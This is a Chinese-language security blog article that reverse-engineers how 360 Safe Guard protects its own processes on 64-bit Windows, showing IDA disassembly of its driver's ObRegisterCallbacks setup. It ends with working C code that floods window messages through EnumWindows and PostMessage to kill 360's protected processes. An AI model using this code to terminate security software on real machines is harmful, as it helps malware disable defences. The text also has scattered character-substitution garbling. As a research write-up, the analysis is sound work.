浅析360在系统的进程自保护及突破

自从改行玩硬件后，就不多关注病毒和反病毒之间的斗争了。某天在中关村论坛听到一
名网友说 360在WIN64 上有了进程自我保护，万分牛逼，连微软的Process Explorer都不
能结束呢！我听后内心十分好奇，因而重操旧业，下载了最新版本的360 安全卫士7.7版本
（2011-5-6），安装在64位 Windows 7虚拟机上来测试。
   首先拿“任务管理器”来测试，果真再次出现了熟悉的“拒绝访问”提示：

 

   而后尝试用用重载NTDLL + ZwGetNextProcess得到句柄，发现NTSTATUS的返回值老是
失败。后来发现OpenProcess能够在低权限下（好比以查询进程信息的权限
PROCESS_QUERY_INFORMATION）打开360 的进程，可是想用DuplicateHandle或者
NtDuplicateObject来得到同一进程的最高权限句柄时就失败了。而后又对线程如法炮制，
依然失败。最后用无句柄杀线程的绝招，连KiInsertQueueApc钩子都抵挡不住的 10 万次
PostThreadMessage，仍是失败。初步测试，发现来者不善，决定先用IDA Pro 5.5分析一
下 360的驱动，再想办法。
  首先用 Win64AST（Win64下的系统工具，有查看内核模块，管理进程等功能，

查看 360加载的驱动：

   能够发现，360 在Win64 系统上只加载了两个驱动：360FsFlt.sys和一个网络相关的驱
动。其中，360FsFlt.sys从名字上来看是文件系统过滤驱动。经分析，在它的里面有进程
自我保护相关的内容。
   在作理智的分析以前，咱们能够先进行猜想，猜想一下360会用什么手段来实现进程自
我保护。第一种方法是Ring 3 的 Inline Hook，虽然安全稳定，可是容易绕过。上次我虽
然有篇文章讲解如何反绕过Ring 3 Inline Hook，可是毕竟判断方法还有必定的瑕疵。所
以我判定，360不会这么作。第二种方法就是废掉Win64的PatchGuard机制，对内核函数
进行 Inline Hook，虽然这种方法最好，可是我确定360也不会这么作。由于360 是一个商
业软件，这种方法稳定性差不说，并且还会给竞争对手以“破坏系统安全机制”的口实。所
以惟一的多是第三种方法，既微软官方推荐的方法：用ObRegisterCallbacks注册一个回
调，监控系统中全部的进线程句柄的动态，一旦发现对本身有害的句柄，立刻就把句柄关闭
并返回一个错误值。在用IDA 的分析中，果真证明了个人猜想。
  首先把360FsFlt.sys拖入 IDA进行反汇编，而后把点击“Imports”，找到
ObRegisterCallbacks，而后双击ObRegisterCallbacks，进入和IDA VIEW-A界面，而后双
击 SUB_1D938，就进入和反汇编代码的界面。什么？您想按F5查看 C代码？呵呵。真的不
好意思，64位的 IDA 不带把汇编代码变成C代码的插件，只能委屈各位看观看晦涩的64位汇编

代码了。顺便说一句，我以为IDA对 64位 BIN文件作的反汇编不怎么正确，可是没什
么确实的证据，因此仍是不要乱说为好。
你们能够看到，在调用ObRegisterCallbacks以前，还往 rax 寄存器里放了两个你们十
分熟悉的对象类型：PsProcessType和 PsThreadType，所以能够很确定地说，360 就是用
ObRegisterCallbacks注册了一个回调，用来监视进程类型句柄和线程类型句柄的动态！截
图以下： 

完整的反汇编以下：  
;int __fastcall sub_1D938(PDRIVER_OBJECT DriverObject, __int64)
sub_1D938 proc near
arg_0= qword ptr 8
mov [rsp+arg_0], rbx
push rdi
sub rsp, 20h
mov rax, cs:PsProcessType
mov rbx, rcx
lea rdx, qword_ABA20
mov cs:qword_34300, rax
mov rax, cs:PsThreadType
lea rcx, unk_342D8
mov cs:qword_34320, rax
lea rax, qword_34300
mov cs:qword_342F8, rax
call cs:ObRegisterCallbacks
mov rdx, cs:qword_ABA20
xor edi, edi
cmp eax, edi
movzx eax, cs:byte_59E12
cmovl rdx, rdi  
test byte ptr cs:dword_59ED8, 4
lea ecx, [rdi+1]
cmovnz eax, ecx
mov cs:qword_ABA20, rdx
mov cs:byte_59E12, al
mov eax, cs:dword_59ED8

test al, 8 jz short loc_1D9D6 xor edx, edx ; __int64 mov rcx, rbx ; DriverObject call sub_1E710 cmp eax, edi mov eax, cs:dword_59ED8 setnl cs:byte_59E13 loc_1D9D6: test al, 10h jz short loc_1D9EF mov rcx, rbx ; DriverObject call sub_2350C cmp eax, edi   setnl al mov cs:byte_59E14, al jmp short loc_1D9F5 loc_1D9EF: mov al, cs:byte_59E14 loc_1D9F5: cmp cs:byte_59E13, dil   jnz short loc_1DA03 cmp al, dil jz short loc_1DA3A loc_1DA03: lea rax, qword_5A2B8 lea rcx, [rbx+70h] loc_1DA0E: cmp [rax-0E8h], rdi jnz short loc_1DA1C cmp [rax], rdi jz short loc_1DA26 loc_1DA1C: lea rdx, sub_1D888 mov [rcx], rdx loc_1DA26: lea rdx, unk_5A390 add rax, 8 add rcx, 8 cmp rax, rdx jle short loc_1DA0E loc_1DA3A: call sub_1D4A0 lea rcx, sub_1D660 xor edx, edx mov rbx, [rsp+28h+arg_0] add rsp, 20h pop rdi jmp cs:PsSetCreateProcessNotifyRoutine sub1D938 endp 我还找了找360实现进线程自保护的过程，可是能力有限，只找到一部分实现[进程自 保护]的过程，没有找到实现[线程自保护]的过程。若是读者有兴趣，能够本身找找：  ; Maybe Protect Process ; int __cdecl sub_18294(HANDLE Handle, char) sub_18294 proc near var_58= qword ptr -58h var_50= byte ptr -50h var_48= qword ptr -48h var_38= byte ptr -38h var_10= qword ptr -10h Handle= qword ptr 8 arg_8= byte ptr 10h mov rax, rsp mov [rax+8], rcx push rbx sub rsp, 70h xor ebx, ebx mov r10, rdx mov [rax+8], rbx   cmp rdx, rbx jz loc_1834F mov rax, cs:qword_59F10 cmp rax, rbx jz short loc_182C8 mov rcx, rdx call rax ; qword_59F10 jmp loc_18351 loc_182C8: lea rax, [rsp+78h+Handle] mov r9d, 80000000h xor r8d, r8d mov [rsp+78h+var_48], rax mov rax, cs:PsProcessType mov [rsp+78h+var_50], bl mov rcx, [rax] mov edx, 200h mov [rsp+78h+var_58], rcx mov rcx, r10 call cs:ObOpenObjectByPointer cmp eax, ebx   jl short loc_1834F mov rcx, [rsp+78h+Handle] lea rax, [rsp+78h+arg_8] lea r8, [rsp+78h+var_38] mov r9d, 30h xor edx, edx mov [rsp+78h+var_58], rax call ZwQueryInformationProcess mov rcx, [rsp+78h+var_10] cmp eax, ebx cmovl rcx, rbx mov [rsp+78h+var_10], rcx mov rcx, [rsp+78h+Handle] ; Handle call cs:ZwClose mov rax, [rsp+78h+var_10] jmp short loc_18351 loc_1834F: xor eax, eax loc_18351: add rsp, 70h pop rbx retn sub_18294 endp 我以为此函数的逻辑是这样：传入进程对象指针PEPROCESS （注意：我强烈以为不是IDA 提示的 HANDLE 类型，而是PEPROCESS 类型。由于对于计算机看来，二者都是指针，没有任 何差异），而后利用ObOpenObjectByPointer得到进程的句柄，利用 ZwQueryInformationProcess得到进程PID，接着对比是否为要保护的进程，而后返回对比  结果。至于关闭[由别的程序打开的][被保护进程的句柄]，返回拒绝访问等操做，并不在这 一过程（这句话很拗口，请多读几回）。至于这个驱动是怎么保护线程的，我有本身的猜测 但并不肯定，由于我并无在反汇编代码中找到ZwQueryInformationThread（可是找到了 IoThreadToProcess）。有俗语云“骗得了别人骗不了本身”，因为没有造成让本身信服的逻 辑，因此不敢信口开河，误导读者。 知道了 360如何自我保护，攻破这套防护体系就简单了：利用窗口攻击便可。由于在 360 的驱动里没有防护窗口攻击的代码。准确地说，是微软没有提供解决窗口攻击官方解决 方案。至于窗口攻击的手段，用EndTask便可（你们能够试试用“任务管理器”的“结束任 务”来结束360safe.exe的主窗口），用SetWindowLong或 SetParent也能够。不过我用的 是EnumWindows + PostMessage的方案。代码很短，只有短短40行，可是对付360safe.exe 和 360tray.exe均可以：   #include <stdio.h> #include <Windows.h> #pragma comment(lib,"user32.lib") HWND hWnds[8192]={NULL}; DWORD dwCount=0; UINT EnumWnd(HWND h, LPARAM Param) {     if (dwCount>=8192)         return 0;

    hWnds[dwCount] = h;     dwCount++;     return 1; } VOID KillGuiProcess(DWORD dwProcessId) {   DWORD pid=0;     EnumWindows((WNDENUMPROC)EnumWnd, 0);     for(UINT i=0;i<dwCount;i++)     {         GetWindowThreadProcessId(hWnds[i], &pid);         if(pid==dwProcessId)          {             for(UINT j=0;j<0x1000;j++)                 PostMessageA(hWnds[i],j,0,0);         }     } } int main() {     DWORD pid=0;     printf("Input 360 PID: ");     scanf("%ld",&pid);     KillGuiProcess(pid); //特别声明：只对360在 Win64的自保护有效！！！     return 0; }  你们还能够看到，个人函数名是KillGuiProcess，也就是说对非GUI 程序无效。经测 试，确实对没有界面的ZhuDongFangYu.exe无效。可是不是说咱们就没有办法对付 ZhuDongFangYu.exe了呢？答案是否认的，不过要用点强制手段了。这里先留下个谜团，借 评书人的经常使用的语句来结束本文：欲知后事如何，请听下回分解。